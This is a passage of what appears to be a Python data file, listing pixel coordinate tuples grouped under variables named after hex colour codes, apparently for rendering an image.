(145, 103), (145, 104), (145, 105), (145, 110), (145, 111), (145, 121), (145, 123), (145, 128), (145, 131), (146, 85), (146, 87), (146, 88), (146, 89), (146, 92), (146, 93), (146, 94), (146, 95), (146, 96), (146, 97), (146, 98), (146, 99), (146, 100), (146, 101), (146, 102), (146, 103), (146, 104), (146, 105), (146, 106), (146, 107), (146, 108), (146, 109), (146, 110), (146, 112), (146, 120), (146, 122), (146, 123), (146, 124), (146, 128), (146, 130), (147, 86), (147, 90), (147, 91), (147, 92), (147, 93), (147, 94), (147, 95), (147, 96), (147, 97), (147, 98), (147, 99), (147, 100), (147, 101), (147, 102), (147, 103), (147, 104), (147, 105), (147, 106), (147, 107), (147, 108), (147, 109), (147, 110), (147, 111), (147, 113), (147, 119), (147, 121), (147, 122), (147, 123), (147, 125), (147, 126), (147, 129), (148, 86), (148, 88),
(148, 89), (148, 90), (148, 91), (148, 92), (148, 93), (148, 94), (148, 95), (148, 96), (148, 97), (148, 98), (148, 99), (148, 100), (148, 101), (148, 102), (148, 103), (148, 104), (148, 105), (148, 106), (148, 107), (148, 108), (148, 109), (148, 110), (148, 111), (148, 112), (148, 115), (148, 116), (148, 120), (148, 121), (148, 123), (148, 128), (149, 87), (149, 89), (149, 90), (149, 91), (149, 92), (149, 93), (149, 94), (149, 95), (149, 96), (149, 97), (149, 98), (149, 99), (149, 100), (149, 101), (149, 102), (149, 103), (149, 104), (149, 105), (149, 106), (149, 107), (149, 108), (149, 109), (149, 110), (149, 111), (149, 112), (149, 113), (149, 117), (149, 119), (149, 120), (149, 121), (149, 123), (149, 128), (150, 87), (150, 89), (150, 90), (150, 91), (150, 92), (150, 93), (150, 94), (150, 95), (150, 96), (150, 97),
(150, 98), (150, 99), (150, 100), (150, 101), (150, 102), (150, 103), (150, 104), (150, 105), (150, 106), (150, 107), (150, 108), (150, 109), (150, 110), (150, 111), (150, 112), (150, 113), (150, 114), (150, 115), (150, 116), (150, 118), (150, 119), (150, 120), (150, 121), (150, 122), (150, 124), (150, 128), (150, 139), (151, 87), (151, 89), (151, 90), (151, 91), (151, 92), (151, 93), (151, 94), (151, 95), (151, 96), (151, 97), (151, 98), (151, 99), (151, 100), (151, 101), (151, 102), (151, 103), (151, 104), (151, 105), (151, 106), (151, 107), (151, 108), (151, 109), (151, 112), (151, 113), (151, 114), (151, 115), (151, 116), (151, 119), (151, 120), (151, 121), (151, 122), (151, 124), (151, 129), (151, 138), (151, 139), (152, 87), (152, 89), (152, 90), (152, 91), (152, 92), (152, 93), (152, 94), (152, 95), (152, 96), (152, 97),
(152, 98), (152, 99), (152, 104), (152, 105), (152, 106), (152, 107), (152, 108), (152, 109), (152, 111), (152, 112), (152, 113), (152, 114), (152, 115), (152, 116), (152, 117), (152, 118), (152, 120), (152, 121), (152, 122), (152, 123), (152, 124), (152, 126), (152, 129), (152, 136), (152, 138), (153, 87), (153, 89), (153, 90), (153, 91), (153, 92), (153, 93), (153, 94), (153, 95), (153, 96), (153, 97), (153, 98), (153, 101), (153, 102), (153, 103), (153, 106), (153, 107), (153, 109), (153, 119), (153, 121), (153, 122), (153, 123), (153, 124), (153, 127), (153, 129), (153, 135), (153, 137), (154, 86), (154, 87), (154, 88), (154, 92), (154, 93), (154, 94), (154, 95), (154, 96), (154, 97), (154, 99), (154, 104), (154, 109), (154, 120), (154, 122), (154, 123), (154, 124), (154, 125), (154, 126), (154, 127), (154, 128), (154, 129),
(154, 130), (154, 133), (154, 136), (155, 86), (155, 90), (155, 91), (155, 93), (155, 94), (155, 95), (155, 96), (155, 98), (155, 106), (155, 108), (155, 121), (155, 123), (155, 124), (155, 125), (155, 126), (155, 127), (155, 128), (155, 129), (155, 132), (155, 136), (156, 86), (156, 88), (156, 92), (156, 94), (156, 95), (156, 96), (156, 98), (156, 122), (156, 124), (156, 125), (156, 126), (156, 127), (156, 128), (156, 129), (156, 130), (156, 133), (156, 134), (156, 136), (157, 86), (157, 93), (157, 95), (157, 96), (157, 98), (157, 122), (157, 124), (157, 125), (157, 126), (157, 127), (157, 128), (157, 129), (157, 130), (157, 131), (157, 132), (157, 133), (157, 134), (157, 136), (158, 94), (158, 96), (158, 98), (158, 123), (158, 128), (158, 129), (158, 130), (158, 131), (158, 132), (158, 133), (158, 134), (158, 135), (158, 136),
(158, 141), (158, 142), (158, 144), (159, 95), (159, 98), (159, 124), (159, 126), (159, 129), (159, 130), (159, 131), (159, 136), (159, 139), (159, 143), (160, 95), (160, 98), (160, 128), (160, 130), (160, 131), (160, 133), (160, 134), (160, 137), (160, 138), (160, 141), (161, 94), (161, 96), (161, 98), (161, 129), (161, 131), (161, 136), (161, 138), (161, 140), (162, 93), (162, 95), (162, 96), (162, 98), (162, 129), (162, 131), (162, 137), (162, 139), (163, 92), (163, 96), (163, 97), (163, 99), (163, 115), (163, 130), (163, 131), (163, 138), (163, 139), (164, 91), (164, 93), (164, 94), (164, 95), (164, 96), (164, 97), (164, 98), (164, 101), (164, 131), (164, 139), (165, 90), (165, 92), (165, 96), (165, 98), (165, 99), (165, 102), (165, 103), (165, 114), (165, 131), (166, 90), (166, 96), (166, 98), (166, 99), (166, 100),
(166, 101), (166, 106), (166, 114), (166, 131), (167, 96), (167, 98), (167, 99), (167, 103), (167, 104), (167, 105), (167, 107), (167, 131), (167, 132), (168, 95), (168, 101), (168, 102), (168, 108), (168, 131), (168, 133), (169, 95), (169, 97), (169, 98), (169, 99), (169, 131), (170, 131), (170, 134), (170, 135), (171, 114), (171, 122), (171, 130), (171, 132), (172, 112), (172, 114), (172, 130), (172, 131), (173, 112), (173, 114), (173, 130), (174, 114), (174, 122), (174, 139), (175, 113), )
coordinates_E1E1E1 = ((68, 122),
(68, 123), (68, 131), (68, 132), (69, 116), (69, 123), (69, 132), (70, 116), (70, 118), (70, 119), (70, 120), (70, 123), (71, 99), (71, 100), (71, 116), (71, 118), (71, 119), (71, 122), (71, 123), (72, 98), (72, 100), (72, 116), (72, 121), (72, 124), (73, 98), (73, 100), (73, 122), (73, 124), (73, 148), (73, 149), (74, 98), (74, 100), (74, 122), (74, 124), (74, 137), (74, 147), (74, 148), (75, 99), (75, 100), (75, 123), (75, 124), (75, 134), (75, 135), (75, 137), (75, 147), (76, 100), (76, 123), (76, 124), (76, 133), (76, 137), (77, 100), (77, 123), (77, 124), (77, 135), (78, 100), (78, 124), (78, 132), (78, 133), (78, 138), (79, 100), (79, 103), (79, 124), (79, 131), (79, 132), (79, 138), (79, 139), (80, 99), (80, 104), (80, 124), (80, 132), (80, 140), (81, 97), (81, 101),
(81, 103), (81, 105), (81, 123), (81, 124), (81, 130), (81, 131), (82, 95), (82, 96), (82, 100), (82, 105), (82, 106), (82, 122), (82, 124), (82, 130), (82, 131), (83, 92), (83, 93), (83, 97), (83, 99), (83, 106), (83, 122), (83, 125), (83, 130), (83, 131), (84, 84), (84, 86), (84, 87), (84, 88), (84, 89), (84, 90), (84, 91), (84, 92), (84, 93), (84, 95), (84, 96), (84, 98), (84, 121), (84, 123), (84, 124), (84, 125), (84, 126), (84, 127), (84, 128), (84, 129), (84, 131), (85, 84), (85, 88), (85, 89), (85, 90), (85, 95), (85, 96), (85, 98), (85, 120), (85, 122), (85, 123), (85, 124), (85, 125), (85, 130), (85, 131), (85, 145), (85, 146), (86, 85), (86, 95), (86, 97), (86, 120), (86, 122), (86, 123), (86, 124), (86, 125), (86, 126), (86, 127), (86, 128),
(86, 129), (86, 130), (86, 132), (86, 144), (87, 95), (87, 97), (87, 119), (87, 121), (87, 122), (87, 123), (87, 124), (87, 125), (87, 126), (87, 127), (87, 128), (87, 129), (87, 130), (87, 131), (87, 134), (87, 142), (88, 97), (88, 118), (88, 120), (88, 121), (88, 122), (88, 123), (88, 124), (88, 125), (88, 126), (88, 127), (88, 128), (88, 129), (88, 130), (88, 131), (88, 132), (88, 135), (88, 140), (89, 96), (89, 98), (89, 117), (89, 119), (89, 120), (89, 121), (89, 122), (89, 123), (89, 124), (89, 125), (89, 126), (89, 127), (89, 128), (89, 129), (89, 130), (89, 131), (89, 132), (89, 133), (89, 134), (89, 136), (89, 137), (89, 138), (90, 96), (90, 99), (90, 116), (90, 118), (90, 119), (90, 120), (90, 121), (90, 122), (90, 123), (90, 124), (90, 125), (90, 126), (90, 127),
(90, 128), (90, 129), (90, 130), (90, 131), (90, 132), (90, 135), (91, 96), (91, 98), (91, 101), (91, 117), (91, 118), (91, 119), (91, 120), (91, 121), (91, 122), (91, 123), (91, 124), (91, 125), (91, 129), (91, 130), (91, 131), (91, 133), (91, 136), (91, 137), (91, 139), (92, 96), (92, 98), (92, 99), (92, 102), (92, 113), (92, 116), (92, 117), (92, 118), (92, 119), (92, 120), (92, 121), (92, 122), (92, 123), (92, 126), (92, 127), (92, 129), (92, 130), (92, 131), (92, 135), (92, 138), (93, 85), (93, 96), (93, 98), (93, 99), (93, 100), (93, 101), (93, 104), (93, 105), (93, 106), (93, 107), (93, 108), (93, 109), (93, 110), (93, 111), (93, 112), (93, 115), (93, 116), (93, 117), (93, 118), (93, 119), (93, 120), (93, 121), (93, 122), (93, 123), (93, 124), (93, 125), (93, 129),
(93, 131), (93, 136), (93, 138), (94, 84), (94, 85), (94, 96), (94, 98), (94, 99), (94, 100), (94, 101), (94, 102), (94, 103), (94, 113), (94, 114), (94, 115), (94, 116), (94, 117), (94, 118), (94, 119), (94, 120), (94, 121), (94, 122), (94, 129), (94, 130), (94, 137), (94, 138), (95, 83), (95, 96), (95, 98), (95, 99), (95, 100), (95, 101), (95, 102), (95, 103), (95, 104), (95, 105), (95, 106), (95, 107), (95, 108), (95, 109), (95, 110), (95, 111), (95, 112), (95, 113), (95, 114), (95, 115), (95, 116), (95, 117), (95, 118), (95, 119), (95, 120), (95, 122), (95, 129), (95, 130), (96, 75), (96, 77), (96, 82), (96, 83), (96, 95), (96, 97), (96, 98), (96, 99), (96, 100), (96, 101), (96, 102), (96, 103), (96, 104), (96, 105), (96, 106), (96, 107), (96, 108), (96, 109),
(96, 110), (96, 111), (96, 112), (96, 115), (96, 116), (96, 117), (96, 118), (96, 119), (96, 120), (96, 122), (96, 129), (96, 130), (97, 75), (97, 78), (97, 79), (97, 80), (97, 82), (97, 95), (97, 97), (97, 98), (97, 99), (97, 100), (97, 101), (97, 102), (97, 103), (97, 104), (97, 105), (97, 106), (97, 107), (97, 108), (97, 109), (97, 110), (97, 113), (97, 114), (97, 117), (97, 118), (97, 119), (97, 120), (97, 122), (97, 128), (97, 130), (98, 76), (98, 81), (98, 96), (98, 98), (98, 99), (98, 100), (98, 101), (98, 102), (98, 103), (98, 104), (98, 105), (98, 106), (98, 107), (98, 108), (98, 109), (98, 112), (98, 115), (98, 116), (98, 118), (98, 119), (98, 120), (98, 121), (98, 123), (98, 127), (98, 130), (99, 76), (99, 79), (99, 81), (99, 96), (99, 98), (99, 99),
(99, 100), (99, 101), (99, 102), (99, 103), (99, 104), (99, 105), (99, 106), (99, 107), (99, 108), (99, 110), (99, 117), (99, 119), (99, 120), (99, 121), (99, 122), (99, 125), (99, 129), (99, 131), (100, 77), (100, 80), (100, 96), (100, 98), (100, 99), (100, 100), (100, 101), (100, 102), (100, 103), (100, 104), (100, 105), (100, 106), (100, 107), (100, 109), (100, 118), (100, 124), (100, 130), (100, 132), (101, 79), (101, 81), (101, 96), (101, 98), (101, 99), (101, 100), (101, 101), (101, 102), (101, 103), (101, 104), (101, 105), (101, 106), (101, 107), (101, 109), (101, 119), (101, 121), (101, 122), (101, 124), (101, 130), (101, 133), (102, 80), (102, 88), (102, 90), (102, 95), (102, 96), (102, 97), (102, 98), (102, 99), (102, 100), (102, 101), (102, 102), (102, 103), (102, 104), (102, 105), (102, 106), (102, 108),
(102, 124), (102, 130), (102, 134), (103, 81), (103, 83), (103, 86), (103, 87), (103, 91), (103, 92), (103, 93), (103, 96), (103, 97), (103, 98), (103, 99), (103, 100), (103, 101), (103, 102), (103, 103), (103, 104), (103, 105), (103, 106), (103, 107), (103, 108), (103, 124), (103, 130), (103, 133), (104, 82), (104, 84), (104, 85), (104, 88), (104, 89), (104, 90), (104, 95), (104, 96), (104, 97), (104, 98), (104, 99), (104, 100), (104, 101), (104, 102), (104, 103), (104, 104), (104, 105), (104, 107), (104, 131), (105, 83), (105, 86), (105, 87), (105, 88), (105, 89), (105, 90), (105, 91), (105, 92), (105, 93), (105, 94), (105, 95), (105, 96), (105, 97), (105, 98), (105, 99), (105, 100), (105, 101), (105, 102), (105, 103), (105, 104), (105, 105), (105, 107), (105, 131), (106, 84), (106, 86), (106, 87), (106, 88),
(106, 94), (106, 95), (106, 96), (106, 97), (106, 98), (106, 99), (106, 100), (106, 101), (106, 102), (106, 103), (106, 104), (106, 105), (106, 107), (106, 130), (106, 131), (107, 84), (107, 86), (107, 87), (107, 89), (107, 90), (107, 91), (107, 92), (107, 93), (107, 95), (107, 96), (107, 97), (107, 98), (107, 99), (107, 100), (107, 101), (107, 102), (107, 103), (107, 104), (107, 105), (107, 107), (107, 130), (107, 131), (108, 71), (108, 73), (108, 74), (108, 75), (108, 76), (108, 83), (108, 85), (108, 86), (108, 88), (108, 94), (108, 96), (108, 97), (108, 98), (108, 99), (108, 104), (108, 105), (108, 107), (108, 130), (108, 131), (109, 70), (109, 77), (109, 78), (109, 79), (109, 80), (109, 81), (109, 84), (109, 85), (109, 87), (109, 95), (109, 97), (109, 98), (109, 101), (109, 102), (109, 103), (109, 105),
(109, 107), (109, 130), (109, 131), (110, 70), (110, 72), (110, 73), (110, 74), (110, 75), (110, 76), (110, 79), (110, 82), (110, 86), (110, 95), (110, 97), (110, 99), (110, 104), (110, 107), (110, 131), (111, 71), (111, 75), (111, 77), (111, 78), (111, 84), (111, 86), (111, 96), (111, 98), (111, 105), (111, 108), (111, 112), (111, 129), (112, 75), (112, 77), (112, 85), (112, 87), (112, 96), (112, 98), (112, 106), (112, 108), (112, 109), (112, 112), (112, 114), (113, 75), (113, 77), (113, 87), (113, 96), (113, 97), (113, 107), (113, 110), (113, 115), (114, 75), (114, 77), (114, 96), (114, 97), (114, 108), (114, 116), (115, 74), (115, 77), (115, 96), (115, 109), (115, 111), (115, 112), (115, 113), (115, 114), (115, 115), (115, 117), (116, 78), (116, 96), (117, 78), (118, 78), (118, 79), )
coordinates_771286 = ((149, 126),
(150, 126), )
coordinates_781286 = ((94, 127),
(95, 125), (95, 127), (96, 127), (97, 125), (97, 126), )
coordinates_EFE68C = ((165, 124),
(165, 126), (166, 121), (166, 123), (166, 127), (167, 120), (167, 124), (167, 125), (167, 127), (168, 120), (168, 122), (168, 123), (168, 124), (168, 126), (168, 127), (169, 120), (169, 122), (169, 123), (169, 124), (169, 126), (170, 120), (170, 122), (170, 123), (170, 124), (170, 126), (171, 120), (171, 122), (171, 123), (171, 124), (171, 126), (172, 120), (172, 122), (172, 123), (172, 124), (172, 126), (173, 120), (173, 122), (173, 123), (173, 124), (173, 126), (174, 120), (174, 122), (174, 123), (174, 124), (174, 126), (175, 120), (175, 122), (175, 123), (175, 124), (175, 126), (176, 120), (176, 122), (176, 123), (176, 124), (176, 126), (177, 120), (177, 122), (177, 123), (177, 124), (177, 126), (178, 120), (178, 122), (178, 123), (178, 124), (178, 126), (179, 120), (179, 122), (179, 123), (179, 124), (179, 126), (180, 120), (180, 122), (180, 123),
(180, 126), (181, 120), (181, 125), (182, 121), (182, 123), )
coordinates_31CD32 = ((170, 147),
(170, 149), (171, 138), (171, 145), (172, 135), (172, 140), (172, 141), (172, 142), (172, 143), (172, 144), (172, 147), (172, 149), (173, 135), (173, 138), (173, 139), (173, 145), (173, 146), (173, 147), (173, 149), (174, 134), (174, 136), (174, 137), (174, 138), (174, 139), (174, 140), (174, 141), (174, 142), (174, 143), (174, 144), (174, 145), (174, 146), (174, 147), (174, 149), (175, 134), (175, 136), (175, 137), (175, 138), (175, 139), (175, 140), (175, 141), (175, 142), (175, 143), (175, 144), (175, 145), (175, 146), (175, 147), (175, 149), (176, 133), (176, 135), (176, 136), (176, 137), (176, 140), (176, 141), (176, 142), (176, 143), (176, 144), (176, 145), (176, 146), (176, 147), (176, 149), (177, 133), (177, 135), (177, 136), (177, 137), (177, 141), (177, 142), (177, 143), (177, 148), (178, 132), (178, 134), (178, 135), (178, 137), (178, 140),
(178, 144), (178, 145), (178, 147), (179, 133), (179, 135), (179, 137), (179, 141), (179, 143), (180, 133), (180, 136), (181, 134), (181, 136), (182, 134), (182, 135), )
coordinates_F0E68C = ((63, 129),
(63, 131), (63, 132), (63, 133), (63, 135), (64, 128), (64, 137), (65, 127), (65, 129), (65, 132), (65, 134), (65, 135), (65, 139), (66, 127), (66, 130), (66, 133), (66, 135), (66, 136), (66, 137), (66, 141), (67, 127), (67, 129), (67, 134), (67, 136), (67, 137), (67, 138), (67, 139), (67, 142), (68, 127), (68, 129), (68, 134), (68, 136), (68, 137), (68, 138), (68, 139), (68, 140), (68, 141), (68, 143), (69, 127), (69, 129), (69, 134), (69, 136), (69, 137), (69, 138), (69, 141), (69, 142), (69, 144), (70, 126), (70, 129), (70, 130), (70, 133), (70, 134), (70, 136), (70, 137), (70, 138), (70, 139), (70, 140), (70, 141), (70, 143), (71, 126), (71, 128), (71, 133), (71, 134), (71, 135), (71, 138), (71, 141), (71, 143), (72, 126), (72, 128), (72, 131), (72, 136), (72, 138), (72, 141),
(72, 142), (73, 126), (73, 128), (73, 129), (73, 130), (73, 134), (73, 139), (73, 141), (74, 126), (74, 128), (74, 131), (74, 133), (74, 139), (75, 126), (75, 128), (75, 129), (75, 130), (75, 132), (75, 139), (76, 126), (76, 128), (76, 129), (76, 131), (77, 127), (77, 130), (78, 127), (78, 129), (79, 127), (79, 129), (80, 127), (80, 128), (81, 128), (82, 127), (82, 128), )
coordinates_32CD32 = ((67, 147),
(67, 149), (68, 146), (68, 150), (69, 146), (69, 148), (69, 149), (69, 151), (70, 145), (70, 146), (70, 147), (70, 148), (70, 149), (70, 150), (70, 152), (71, 145), (71, 147), (71, 148), (71, 149), (71, 150), (71, 152), (72, 144), (72, 146), (72, 147), (72, 148), (72, 149), (72, 150), (72, 151), (72, 153), (73, 143), (73, 145), (73, 146), (73, 147), (73, 148), (73, 149), (73, 150), (73, 151), (73, 153), (74, 142), (74, 144), (74, 145), (74, 146), (74, 147), (74, 148), (74, 149), (74, 150), (74, 151), (74, 153), (75, 141), (75, 143), (75, 144), (75, 145), (75, 146), (75, 147), (75, 148), (75, 149), (75, 150), (75, 151), (75, 153), (76, 140), (76, 142), (76, 143), (76, 144), (76, 145), (76, 146), (76, 147), (76, 148), (76, 149), (76, 150), (76, 153), (77, 140), (77, 142), (77, 143),
(77, 144), (77, 145), (77, 146), (77, 147), (77, 148), (77, 151), (77, 153), (78, 140), (78, 142), (78, 143), (78, 144), (78, 145), (78, 146), (78, 149), (78, 150), (79, 134), (79, 135), (79, 142), (79, 144), (79, 145), (79, 148), (80, 134), (80, 136), (80, 142), (80, 146), (81, 133), (81, 135), (81, 138), (81, 142), (81, 145), (82, 133), (82, 135), (82, 136), (82, 139), (82, 140), (82, 143), (83, 133), (83, 135), (83, 136), (83, 137), (83, 138), (83, 142), (84, 133), (84, 140), (84, 141), (85, 134), (85, 136), (85, 137), (85, 139), )
coordinates_DCF8A4 = ((90, 164),
(91, 159), (91, 164), (92, 159), (92, 160), (92, 164), (93, 159), (93, 160), (93, 163), (93, 164), (94, 159), (94, 165), (95, 159), (95, 163), (95, 164), (95, 166), (96, 159), (96, 161), (96, 162), (96, 163), (96, 164), (96, 166), (97, 159), (97, 161), (97, 162), (97, 163), (97, 165), (98, 159), (98, 161), (98, 162), (98, 164), (99, 158), (99, 160), (99, 161), (99, 162), (99, 164), (100, 158), (100, 160), (100, 161), (100, 162), (100, 164), (101, 158), (101, 160), (101, 161), (101, 162), (101, 164), (102, 149), (102, 158), (102, 160), (102, 161), (102, 162), (102, 164), (103, 157), (103, 159), (103, 160), (103, 161), (103, 162), (103, 164), (104, 150), (104, 156), (104, 158), (104, 159), (104, 160), (104, 161), (104, 162), (104, 164), (105, 150), (105, 155), (105, 157), (105, 158), (105, 159), (105, 160), (105, 161),
(105, 162), (105, 164), (106, 151), (106, 154), (106, 156), (106, 157), (106, 158), (106, 159), (106, 160), (106, 161), (106, 162), (106, 164), (107, 151), (107, 153), (107, 155), (107, 156), (107, 157), (107, 158), (107, 159), (107, 160), (107, 161), (107, 162), (107, 164), (108, 151), (108, 154), (108, 155), (108, 156), (108, 157), (108, 158), (108, 159), (108, 160), (108, 161), (108, 162), (108, 164), (109, 151), (109, 153), (109, 154), (109, 155), (109, 156), (109, 157), (109, 158), (109, 159), (109, 160), (109, 161), (109, 162), (109, 164), (110, 150), (110, 152), (110, 153), (110, 154), (110, 155), (110, 156), (110, 157), (110, 158), (110, 159), (110, 160), (110, 161), (110, 162), (110, 164), (111, 150), (111, 152), (111, 153), (111, 154), (111, 155), (111, 156), (111, 157), (111, 158), (111, 159), (111, 160), (111, 161), (111, 162), (111, 164),
(112, 149), (112, 151), (112, 152), (112, 153), (112, 154), (112, 155), (112, 156), (112, 157), (112, 158), (112, 159), (112, 160), (112, 161), (112, 162), (112, 164), (113, 149), (113, 151), (113, 152), (113, 153), (113, 154), (113, 155), (113, 156), (113, 157), (113, 158), (113, 159), (113, 160), (113, 161), (113, 163), (114, 149), (114, 151), (114, 152), (114, 153), (114, 154), (114, 155), (114, 156), (114, 157), (114, 158), (114, 159), (114, 160), (114, 162), (115, 149), (115, 151), (115, 152), (115, 153), (115, 154), (115, 155), (115, 156), (115, 157), (115, 158), (115, 161), (116, 149), (116, 151), (116, 152), (116, 153), (116, 154), (116, 155), (116, 156), (116, 159), (116, 160), (116, 161), (117, 149), (117, 152), (117, 153), (117, 154), (117, 157), (117, 158), (118, 150), (118, 156), (119, 152), (119, 154), )
coordinates_DBF8A4 = ((126, 155),
(127, 157), (128, 152), (128, 155), (128, 156), (128, 159), (128, 161), (129, 151), (129, 153), (129, 154), (129, 155), (129, 156), (129, 157), (129, 158), (129, 161), (130, 151), (130, 153), (130, 154), (130, 155), (130, 156), (130, 157), (130, 158), (130, 159), (130, 160), (130, 162), (131, 151), (131, 153), (131, 154), (131, 155), (131, 156), (131, 157), (131, 158), (131, 159), (131, 160), (131, 162), (132, 151), (132, 153), (132, 154), (132, 155), (132, 156), (132, 157), (132, 158), (132, 159), (132, 160), (132, 161), (132, 163), (133, 150), (133, 152), (133, 153), (133, 154), (133, 155), (133, 156), (133, 157), (133, 158), (133, 159), (133, 160), (133, 161), (133, 163), (134, 150), (134, 152), (134, 153), (134, 154), (134, 155), (134, 156), (134, 157), (134, 158), (134, 159), (134, 160), (134, 161), (134, 163), (135, 150), (135, 152), (135, 153),
(135, 154), (135, 155), (135, 156), (135, 157), (135, 158), (135, 159), (135, 160), (135, 161), (135, 162), (135, 163), (135, 164), (136, 150), (136, 152), (136, 153), (136, 154), (136, 155), (136, 156), (136, 157), (136, 158), (136, 159), (136, 160), (136, 161), (136, 162), (136, 164), (137, 150), (137, 152), (137, 153), (137, 154), (137, 155), (137, 156), (137, 157), (137, 158), (137, 159), (137, 160), (137, 161), (137, 162), (137, 164), (138, 151), (138, 153), (138, 154), (138, 155), (138, 156), (138, 157), (138, 158), (138, 159), (138, 160), (138, 161), (138, 162), (138, 164), (139, 151), (139, 155), (139, 156), (139, 157), (139, 158), (139, 159), (139, 160), (139, 161), (139, 162), (139, 164), (140, 151), (140, 153), (140, 154), (140, 157), (140, 158), (140, 159), (140, 160), (140, 161), (140, 162), (140, 164), (141, 152), (141, 157), (141, 158),
(141, 159), (141, 160), (141, 161), (141, 162), (141, 164), (142, 150), (142, 151), (142, 156), (142, 158), (142, 159), (142, 160), (142, 161), (142, 162), (142, 164), (143, 150), (143, 157), (143, 159), (143, 160), (143, 161), (143, 162), (143, 164), (144, 158), (144, 160), (144, 161), (144, 162), (144, 164), (145, 158), (145, 160), (145, 161), (145, 162), (145, 163), (145, 165), (146, 159), (146, 161), (146, 162), (146, 163), (146, 165), (147, 159), (147, 161), (147, 162), (147, 163), (147, 164), (147, 166), (148, 160), (148, 162), (148, 163), (148, 164), (148, 165), (149, 160), (149, 162), (149, 163), (149, 164), (149, 165), (149, 166), (149, 169), (150, 160), (150, 162), (150, 163), (150, 165), (150, 168), (150, 170), (151, 160), (151, 162), (151, 163), (151, 165), (151, 169), (151, 171), (152, 159), (152, 160), (152, 163), (152, 165), (152, 170),
(152, 171), (153, 159), (153, 162), (153, 165), (154, 159), (154, 160), (154, 163), (154, 165), (155, 158), (155, 159), (155, 164), (155, 165), (156, 158), (156, 159), (156, 164), (156, 165), (157, 159), (157, 164), (157, 166), (158, 157), (158, 158), (158, 165), (158, 166), (159, 157), (159, 158), (159, 165), (159, 166), (160, 158), (161, 158), (163, 157), (164, 157), )
coordinates_60CC60 = ((74, 161),
(74, 163), (75, 159), (75, 164), (76, 157), (76, 161), (76, 162), (76, 163), (76, 165), (77, 156), (77, 159), (77, 160), (77, 161), (77, 162), (77, 163), (77, 164), (77, 166), (78, 157), (78, 158), (78, 159), (78, 160), (78, 161), (78, 162), (78, 163), (78, 164), (78, 165), (78, 169), (79, 155), (79, 157), (79, 158), (79, 159), (79, 160), (79, 161), (79, 162), (79, 163), (79, 164), (79, 165), (79, 166), (79, 170), (80, 155), (80, 157), (80, 158), (80, 159), (80, 160), (80, 161), (80, 162), (80, 163), (80, 164), (80, 165), (80, 166), (80, 167), (80, 168), (80, 169), (80, 171), (81, 155), (81, 157), (81, 158), (81, 159), (81, 160), (81, 161), (81, 162), (81, 163), (81, 164), (81, 165), (81, 166), (81, 167), (81, 168), (81, 169), (81, 171), (82, 154), (82, 156), (82, 157), (82, 158),
(82, 159), (82, 160), (82, 161), (82, 162), (82, 163), (82, 164), (82, 165), (82, 166), (82, 167), (82, 168), (82, 169), (82, 170), (82, 172), (83, 154), (83, 156), (83, 157), (83, 158), (83, 159), (83, 160), (83, 161), (83, 162), (83, 163), (83, 164), (83, 165), (83, 166), (83, 167), (83, 168), (83, 169), (83, 170), (83, 172), (84, 154), (84, 156), (84, 157), (84, 158), (84, 159), (84, 160), (84, 161), (84, 162), (84, 163), (84, 164), (84, 165), (84, 166), (84, 167), (84, 168), (84, 169), (84, 170), (84, 171), (84, 173), (85, 153), (85, 155), (85, 156), (85, 157), (85, 158), (85, 159), (85, 160), (85, 161), (85, 162), (85, 163), (85, 164), (85, 165), (85, 166), (85, 167), (85, 168), (85, 169), (85, 170), (85, 171), (85, 173), (86, 153), (86, 155), (86, 156), (86, 157), (86, 159),
(86, 160), (86, 161), (86, 162), (86, 163), (86, 164), (86, 165), (86, 166), (86, 167), (86, 168), (86, 169), (86, 170), (86, 171), (86, 172), (86, 174), (87, 152), (87, 154), (87, 155), (87, 156), (87, 157), (87, 160), (87, 161), (87, 162), (87, 163), (87, 166), (87, 167), (87, 168), (87, 169), (87, 170), (87, 171), (87, 172), (87, 173), (87, 175), (88, 152), (88, 154), (88, 155), (88, 156), (88, 160), (88, 161), (88, 162), (88, 165), (88, 166), (88, 167), (88, 168), (88, 169), (88, 170), (88, 171), (88, 172), (88, 173), (88, 175), (89, 151), (89, 153), (89, 154), (89, 156), (89, 160), (89, 163), (89, 166), (89, 168), (89, 169), (89, 170), (89, 171), (89, 172), (89, 173), (89, 174), (89, 176), (90, 151), (90, 153), (90, 154), (90, 156), (90, 161), (90, 162), (90, 166), (90, 168),
(90, 169), (90, 170), (90, 171), (90, 172), (90, 173), (90, 174), (90, 175), (90, 176), (91, 150), (91, 152), (91, 153), (91, 154), (91, 156), (91, 161), (91, 162), (91, 166), (91, 168), (91, 169), (91, 170), (91, 171), (91, 172), (91, 173), (91, 174), (91, 175), (91, 177), (92, 149), (92, 151), (92, 152), (92, 153), (92, 154), (92, 155), (92, 157), (92, 166), (92, 168), (92, 169), (92, 170), (92, 171), (92, 172), (92, 173), (92, 174), (92, 175), (92, 177), (93, 148), (93, 150), (93, 151), (93, 152), (93, 153), (93, 154), (93, 155), (93, 157), (93, 167), (93, 169), (93, 170), (93, 171), (93, 172), (93, 173), (93, 174), (93, 175), (93, 177), (94, 148), (94, 150), (94, 151), (94, 152), (94, 153), (94, 154), (94, 155), (94, 157), (94, 168), (94, 170), (94, 171), (94, 172), (94, 173),
(94, 174), (94, 175), (94, 177), (95, 148), (95, 150), (95, 151), (95, 152), (95, 153), (95, 154), (95, 156), (95, 168), (95, 170), (95, 171), (95, 172), (95, 173), (95, 174), (95, 175), (95, 177), (96, 147), (96, 149), (96, 150), (96, 151), (96, 152), (96, 153), (96, 154), (96, 156), (96, 168), (96, 170), (96, 171), (96, 172), (96, 173), (96, 174), (96, 175), (96, 177), (97, 146), (97, 148), (97, 149), (97, 150), (97, 151), (97, 152), (97, 153), (97, 154), (97, 155), (97, 157), (97, 167), (97, 169), (97, 170), (97, 171), (97, 172), (97, 173), (97, 174), (97, 175), (97, 177), (98, 147), (98, 149), (98, 150), (98, 151), (98, 152), (98, 153), (98, 154), (98, 155), (98, 157), (98, 167), (98, 169), (98, 170), (98, 171), (98, 172), (98, 173), (98, 174), (98, 175), (98, 176), (98, 178),
